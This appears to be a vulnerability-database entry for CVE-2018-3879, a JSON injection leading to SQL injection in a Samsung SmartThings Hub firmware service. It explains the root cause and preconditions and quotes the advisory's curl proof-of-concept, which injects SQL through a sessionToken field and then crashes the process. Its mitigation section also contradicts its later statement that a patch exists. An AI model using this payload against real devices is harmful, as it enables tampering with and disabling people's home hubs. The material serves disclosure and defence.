CVE-2018-3879
Description
An exploitable JSON injection vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17. The video-core process incorrectly parses the user-controlled JSON payload, leading to a JSON injection which in turn leads to a SQL injection in the video-core database. An attacker can send a series of HTTP requests to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A JSON injection in the credentials handler of Samsung SmartThings Hub STH-ETH-250 firmware 0.20.17 leads to SQL injection, allowing authenticated attackers to execute arbitrary SQL commands.
Vulnerability
The vulnerability resides in the credentials handler of the video-core HTTP server on Samsung SmartThings Hub STH-ETH-250 devices running firmware version 0.20.17. The video-core process incorrectly parses user-controlled JSON payloads, resulting in a JSON injection that subsequently enables SQL injection into the video-core database. This issue is classified as CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') [1].
Exploitation
An attacker with network access and low privileges (authenticated user) can exploit this vulnerability by sending a series of crafted HTTP requests to the credentials handler. The malicious JSON payload is parsed incorrectly, allowing the attacker to inject arbitrary SQL commands into the video-core database. No user interaction beyond authentication is required [1].
Impact
Successful exploitation allows the attacker to execute arbitrary SQL statements against the video-core database. This can lead to disclosure, modification, or deletion of sensitive data, and potentially compromise the confidentiality, integrity, and availability of the hub. The CVSSv3 score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) [1].
Mitigation
As of the publication date (2018-08-23), no firmware update or workaround has been disclosed in the available reference [1]. Users are advised to monitor Samsung's security advisories for future patches. The device is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: =0.20.17
- Samsung/SmartThings Hub STH-ETH-250v5Range: Firmware version 0.20.17
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"No sanitization is performed on user-controlled JSON parameter values before they are re-serialized via sprintf into a new JSON string, which is then used to construct a SQL query, allowing JSON injection that leads to SQL injection."
Attack vector
An attacker sends a POST request to http://127.0.0.1:3000/credentials with a JSON body where string values use single quotes instead of double quotes. Because the json-c library was compiled with JSON_TOKENER_STRICT=0, single-quoted strings are accepted. When the parameters are later re-serialized via sprintf into a new JSON string, the unsanitized single-quoted content can break out of the JSON string context and inject arbitrary JSON keys. These injected keys become column names in the generated SQL UPDATE query, and because sqlite3_exec allows stacked queries, a semicolon in an injected key lets the attacker execute arbitrary SQL statements. The request can be delivered by anyone who can impersonate the remote SmartThings servers (relayed through hubCore), by a malicious SmartApp running inside hubCore (which can make localhost connections), or potentially through the SmartThings mobile application if the attacker possesses a valid OAuth bearer token [ref_id=1].
Affected code
The vulnerability resides in the credentials handler of the video-core HTTP server, specifically in function sub_3E4EC which parses the JSON POST body for the "/credentials" path. The JSON string is parsed with json_tokener_parse, then parameters are extracted and later re-serialized via sprintf into a new JSON string using format string [8] without any sanitization. The resulting JSON is passed to db_add (sub_28874) which generates and executes a SQL UPDATE query via sqlite3_exec.
What the fix does
The advisory states the vendor patched the vulnerability on 2018-07-17, but no patch diff is included in the bundle. The root cause is the lack of sanitization on user-controlled JSON parameters throughout the parsing and re-serialization logic. To close the vulnerability, the vendor would need to either (a) properly escape or validate all parameter values before inserting them into the sprintf format string, (b) enforce strict JSON parsing (JSON_TOKENER_STRICT=1) to reject single-quoted strings, or (c) use parameterized queries instead of building SQL statements via string concatenation from JSON input [ref_id=1].
Preconditions
- networkAttacker must be able to send HTTP requests to the video-core process on port 3000 (localhost). This can be achieved by impersonating the remote SmartThings servers, running a malicious SmartApp inside hubCore, or potentially via the mobile app with a valid OAuth token.
- configThe json-c library must be compiled with JSON_TOKENER_STRICT=0 (which is the case in firmware 0.20.17), allowing single-quoted strings.
- inputThe POST body must contain the required JSON parameters: s3.secretKey, s3.accessKey, s3.sessionToken, s3.bucket, s3.directory, s3.region, and videoHostUrl.
Reproduction
The following proof of concept from the advisory demonstrates the vulnerability by crashing the video-core process [ref_id=1]:
``` # using curl from inside the hub, but the same request could be sent using a SmartApp $ sInj='","_id=0 where 1=2;insert into camera values (123,replace(substr(quote(zeroblob((10000 + 1) / 2)), 3, 10000), \"0\", \"A\"),1,1,1,1,1,1,1,1,1,1,1,1,1,1);--":"' $ curl -X POST 'http://127.0.0.1:3000/credentials' -d "{'s3':{'accessKey':'','secretKey':'','directory':'','region':'','bucket':'','sessionToken':'${sInj}'},'videoHostUrl':'127.0.0.1/'}" $ curl -X DELETE "http://127.0.0.1:3000/cameras/123" ```
The first curl injects a SQL query via the sessionToken field using single quotes to break out of the JSON string. The injected SQL creates a camera record with an oversized locationId column. The second curl triggers a stack-based buffer overflow when reading that oversized field (TALOS-2018-0557).
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2018-0556mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.